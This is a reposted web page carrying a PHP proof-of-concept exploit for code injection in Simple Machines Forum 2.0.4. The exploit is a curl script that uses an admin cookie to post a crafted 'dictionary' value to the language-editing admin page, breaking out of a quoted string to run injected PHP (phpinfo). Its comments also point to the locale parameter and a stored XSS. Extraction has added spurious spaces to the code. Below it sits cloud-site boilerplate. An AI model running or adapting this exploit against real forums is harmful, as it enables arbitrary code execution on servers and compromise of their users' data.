SMF 2.0.4 PHP Code Injection

Source: Internet
Author: User

<? Php // proof of concept that latest SMF (2.0.4) can be exploited by php injection. // payload code must escape from \ ', so you should try with something like that: // p0c \'; phpinfo (); // as a 'dictionary 'value. same story for locale parameter. // For character_set-another story, as far as I remember, because here we have // a nice stored xss .;) // 21/04/2013 // http://HauntIT.blogspot.com // To successfully exploit smf 2.0.4 we need correct admin's cookie: $ cookie = 'smfcookie956 = allCookiesHere '; $ ch = curl_init (' http://smf_2.0.4/index.php?action=admin;area=languages;sa=editlang;lid=english '); Curl_setopt ($ ch, CURLOPT_HEADER, 1); curl_setopt ($ ch, CURLOPT_COOKIE, $ cookie); curl_setopt ($ ch, CURLOPT_POST, 1 ); // send as POST (to 'on') curl_setopt ($ ch, CURLOPT_POSTFIELDS, "character_set = en & locale = helloworld & dictionary = p0c \ '; phpinfo (); // & spelling = american & ce0361602df1 = Extract & save_main = Save "); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); $ page = curl_exec ($ ch); echo 'Php code: <br> '. $ page; curl_close ($ ch); // to close 'loged'-in' part?>

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.